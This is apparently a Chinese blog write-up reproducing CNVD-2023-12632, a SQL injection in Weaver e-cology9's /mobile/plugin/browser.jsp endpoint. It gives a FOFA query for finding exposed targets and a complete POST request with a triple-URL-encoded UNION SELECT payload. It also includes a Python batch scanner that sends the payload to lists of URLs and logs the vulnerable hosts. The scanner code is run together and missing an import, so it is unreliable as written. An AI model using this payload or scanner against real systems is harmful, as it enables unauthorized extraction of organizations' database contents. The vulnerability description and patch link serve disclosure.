当前位置: 首页 > news >正文

CNVD-2023-12632:泛微E-cology9 browserjsp SQL注入漏洞复现 [附POC]

news 来源:原创 2024/5/19 10:38:01

文章目录

  • 泛微E-cology9 browserjsp SQL注入漏洞(CNVD-2023-12632)漏洞复现 [附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现
    • 0x06 修复建议

泛微E-cology9 browserjsp SQL注入漏洞(CNVD-2023-12632)漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

由于e-cology OA对用户输入内容的验证存在缺陷。未经身份验证的远程攻击者通过向目标系统发送特制的字符串,最终可实现获取目标数据库中的敏感信息。

0x03 影响版本

泛微e-cology V9<10.56

0x04 漏洞环境

FOFA语法:app=“泛微-协同商务系统”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (POST)

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 649isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

PS:keyword参数后面的值是以下语句经过三次url编码后得到的。

a' union select 1,''+(SELECT @@VERSION)+'

在这里插入图片描述

3.复现

1.发送SQL注入查询数据库版本的数据包。
在这里插入图片描述

2.批量验证脚本

地址:

https://github.com/SharpKean/CNVD-2023-12632_POC

import requests
from termcolor import colored
import signal# Disable SSL certificate verification
requests.packages.urllib3.disable_warnings()output_file = None  # 全局变量def check_url(url, output=None):headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","Accept-Encoding": "gzip, deflate","Accept-Language": "zh-CN,zh;q=0.9","Connection": "close"}proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}data = {"isDis": "1","browserTypeId": "269","keyword": "%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37"}try:modified_url = url + '/mobile/%20/plugin/browser.jsp'response = requests.post(modified_url, data=data, headers=headers, verify=False, timeout=3)content = response.textif "show2" in content:result = colored(url + " 存在", 'red')if output:with open(output, 'a') as file:  # 以追加模式打开文件file.write(url + '\n')print(result)  # 即时打印结果else:result = url + " 不存在"print(result)  # 即时打印结果except requests.exceptions.RequestException as e:pass  # 不进行任何操作,直接请求下一个URLdef check_urls_from_file(filename, output=None):with open(filename, 'r') as file:url_list = file.read().strip().split('\n')for url in url_list:check_url(url, output)# 捕获中断信号signal.signal(signal.SIGINT, handle_interrupt)def handle_interrupt(signum, frame):global output_file# 在捕获中断时保存当前扫描结果,并关闭文件if output_file:output_file.close()print("\n扫描已中断并保存当前结果。")exit()def main():global output_fileparser = argparse.ArgumentParser(description='CNVD-2023-12632检测POC')parser.add_argument('-u', '--url', help='检测单个URL')parser.add_argument('-r', '--file', help='从文本中批量检测URL')parser.add_argument('-o', '--output', help='将检测到的输出到文本中')args = parser.parse_args()if args.output:output_file = open(args.output, 'a')  # 以追加模式打开输出文件if args.url:check_url(args.url, args.output)elif args.file:check_urls_from_file(args.file, args.output)else:parser.print_help()# 注册捕获中断信号的处理程序signal.signal(signal.SIGINT, handle_interrupt)# 关闭输出文件if output_file:output_file.close()

PS:使用方法:

-h		帮助
-u		检测单个URL
-r		读取文件批量检测
-o		将检测到的输出到文本中

在这里插入图片描述

0x06 修复建议

厂商已经更新补丁,修复方案:

 https://www.weaver.com.cn/cs/securityDownload.asp#

相关文章:

  • 『亚马逊云科技产品测评』活动征文|通过Lightsail搭建个人笔记
  • 《安富莱嵌入式周报》第327期:Cortex-A7所有外设单片机玩法LL/HAL库全面上线,分享三款GUI, PX5 RTOS推出网络协议栈,小米Vela开源
  • ④【Set】Redis常用数据类型: Set [使用手册]
  • 电子学会C/C++编程等级考试2022年12月(一级)真题解析
  • Linux安装Mysql详细教程(两种安装方法)
  • PyTorch中并行训练的几种方式
  • k8s安装jenkins
  • SpringCloud微服务 【实用篇】| Eureka注册中心、Ribbon负载均衡
  • 如何开发干洗店用的小程序
  • ChatGPT 也并非万能,品牌如何搭上 AIGC「快班车」
  • 代码规范之-理解ESLint、Prettier、EditorConfig
  • 【Nginx】nginx 解决504超时问题
  • Spring Cloud实战 |分布式系统的流量控制、熔断降级组件Sentinel如何使用
  • 阿里云99元服务器ECS经济型e实例性能如何?测评来了
  • opencv-直方图
  • C++类的相互关联
  • express + mock 让前后台并行开发
  • IP路由与转发
  • JavaScript 事件——“事件类型”中“HTML5事件”的注意要点
  • JDK9: 集成 Jshell 和 Maven 项目.
  • k8s如何管理Pod
  • MySQL-事务管理(基础)
  • Redash本地开发环境搭建
  • Vultr 教程目录
  • 基于遗传算法的优化问题求解
  • 前端面试题总结
  • 日剧·日综资源集合(建议收藏)
  • 数据库写操作弃用“SELECT ... FOR UPDATE”解决方案
  • 微信如何实现自动跳转到用其他浏览器打开指定页面下载APP
  • 延迟脚本的方式
  • 我们雇佣了一只大猴子...
  • 直播平台建设千万不要忘记流媒体服务器的存在 ...
  • ​LeetCode解法汇总2583. 二叉树中的第 K 大层和
  • ​ubuntu下安装kvm虚拟机
  • (1)Nginx简介和安装教程
  • (done) NLP “bag-of-words“ 方法 (带有二元分类和多元分类两个例子)词袋模型、BoW
  • (编程语言界的丐帮 C#).NET MD5 HASH 哈希 加密 与JAVA 互通
  • (附源码)ssm基于jsp高校选课系统 毕业设计 291627
  • (强烈推荐)移动端音视频从零到上手(上)
  • (原創) X61用戶,小心你的上蓋!! (NB) (ThinkPad) (X61)
  • (转) ns2/nam与nam实现相关的文件
  • .bat批处理(十):从路径字符串中截取盘符、文件名、后缀名等信息
  • .halo勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
  • .net core 6 redis操作类
  • .NET 应用架构指导 V2 学习笔记(一) 软件架构的关键原则
  • .NET/C# 异常处理:写一个空的 try 块代码,而把重要代码写到 finally 中(Constrained Execution Regions)
  • .net对接阿里云CSB服务
  • .NET框架类在ASP.NET中的使用(2) ——QA
  • .Net转Java自学之路—SpringMVC框架篇六(异常处理)
  • .sdf和.msp文件读取
  • @SuppressWarnings(unchecked)代码的作用
  • @Transactional 详解
  • [ 云计算 | AWS ] AI 编程助手新势力 Amazon CodeWhisperer:优势功能及实用技巧
  • []error LNK2001: unresolved external symbol _m
  • [AAuto]给百宝箱增加娱乐功能